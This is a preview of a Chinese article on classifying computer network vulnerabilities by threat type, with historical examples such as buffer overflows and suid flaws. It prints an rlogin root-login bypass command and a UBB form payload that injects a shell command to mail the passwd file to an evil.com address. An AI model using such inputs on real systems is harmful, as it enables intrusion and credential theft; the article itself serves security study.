计算机网络系统安全漏洞分类研究

计算机网络系统安全漏洞分类研究

ID:19575594

大小:40.00 KB

页数:10页

时间:2018-10-03

计算机网络系统安全漏洞分类研究_第1页
计算机网络系统安全漏洞分类研究_第2页
计算机网络系统安全漏洞分类研究_第3页
计算机网络系统安全漏洞分类研究_第4页
计算机网络系统安全漏洞分类研究_第5页
资源描述:

《计算机网络系统安全漏洞分类研究》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库

1、计算机网络系统安全漏洞分类研究计算机网络系统安全漏洞分类研究.txt41滴水能穿石,只因为它永远打击同一点。42火柴如果躲避燃烧的痛苦,它的一生都将黯淡无光。※黑客攻防指南※===>黑客入门==>计算机网络系统安全漏洞分类研究计算机网络系统安全漏洞分类研究stardust写本文的目地是为了总结一些东西,解决在试图构造一个漏洞数据库的过程中碰到的主要问题,也就是如何对计算机网络漏洞进行分类的问题。文中的一些想法并不成熟,有些甚至连自己也不满意,权作抛砖引玉,以期与在这方面有深入研究的同仁交流,共同提高完善。一个计算机网络安全

2、漏洞有它多方面的属性,我认为主要可以用以下几个方面来概括:漏洞可能造成的直接威胁,漏洞的成因,漏洞的严重性,漏洞被利用的方式。以下的讨论将回绕这几个方面对漏洞细分其类。A.按漏洞可能对系统造成的直接威胁可以大致分成以下几类,事实上一个系统漏洞对安全造成的威胁远不限于它的直接可能性,如果攻击者获得了对系统的一般用户访问权限,他就极有可能再通过利用本地漏洞把自己升级为管理员权限:一.远程管理员权限攻击者无须一个账号登录到本地直接获得远程系统的管理员权限,通常通过攻击以root身份执行的有缺陷的系统守护进程来完成。漏洞的绝大部分

3、来源于缓冲区溢出,少部分来自守护进程本身的逻辑缺陷。典型漏洞:IMAP4rev1v10.190版的守护进程imapd的AUTHENTICATE命令存在读入参数时未做长度检查,构造一个精心设计的AUTH命令串,可以溢出imapd的缓冲区,执行指定的命令,由于imapd以root身份运行,从而直接获得机器的root权限。WindowsNT IIS4.0的ISAPIDLL对输入的URL未做适当的边界检查,如果构造一个超长的URL,可以溢出IIS(inetinfo.exe)的缓冲区,执行我们指定的代码。由于inetinfo.exe

4、是以localsystem身份启动,溢出后可以直接得到管理员权限。早期AIX3.2rlogind代码存在认证逻辑缺陷,用rloginvictim.com-l-froot,可以直接以root身份登录到系统而无须提供口令。二.本地管理员权限攻击者在已有一个本地账号能够登录到系统的情况下,通过攻击本地某些有缺陷的suid程序,竞争条件等手段,得到系统的管理员权限。典型漏洞:RedHatLinux的restore是个suid程序,它的执行依靠一个中RSH的环境变量,通过设置环境变量PATH,可以使RSH变量中的可执行程序以root

5、身份运行,从而获得系统的root权限。Solaris7的Xsun程序有suid位,它对输入参数未做有效的边界检查,可以很容易地溢出它的缓冲区,以root身份运行我们指定的代码,从而获得管理员权限。在windows2000下,攻击者就有机会让网络DDE(一种在不同的Windows机器上的应用程序之间动态共享数据的技术)代理在本地系统用户的安全上下文中执行其指定的代码,从而提升权限并完全控制本地机器。三.普通用户访问权限攻击者利用服务器的漏洞,取得系统的普通用户存取权限,对UNIX类系统通常是shell访问权限,对Window

6、s系统通常是cmd.exe的访问权限,能够以一般用户的身份执行程序,存取文件。攻击者通常攻击以非root身份运行的守护进程,有缺陷的cgi程序等手段获得这种访问权限。典型漏洞:UBB是个广泛运行于各种UNIX和Windows系统的论坛程序,用PERL实现,它的5.19以下版本存在输入验证问题,通过提交精心构造的表单内容,可以使UBB去执行shell命令,因为一般的web服务器以nobody身份运行,因此可以得到一个nobodyshell。比如提交这样的数据:topic='012345.ubb

7、mailhacker@evil

8、.com

9、',我们就可以得到系统的passwd文件。RedHatLinux6.2带的innd2.2.2.3版新闻服务器,存在缓冲区溢出漏洞,通过一个精心构造的新闻信件可以使innd服务器以news身份运行我们指定的代码,得到一个innd权限的shell。Windows IIS4.0-5.0存在Unicode解码漏洞,可以使攻击者利用cmd.exe以guest组的权限在系统上运行程序。相当于取得了普通用户的权限。四.权限提升攻击者在本地通过攻击某些有缺陷的sgid程序,把自己的权限提升到某个非root

10、用户的水平。获得管理员权限可以看做是一种特殊的权限提升,只是因为威胁的大小不同而把它独立出来。典型漏洞:RedHatLinux6.1带的man程序为sgidman,它存在formatbug,通过对它的溢出攻击,可以使攻击者得到man组的用户权限。Solaris7的write程序为sgidtty,它存在缓

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。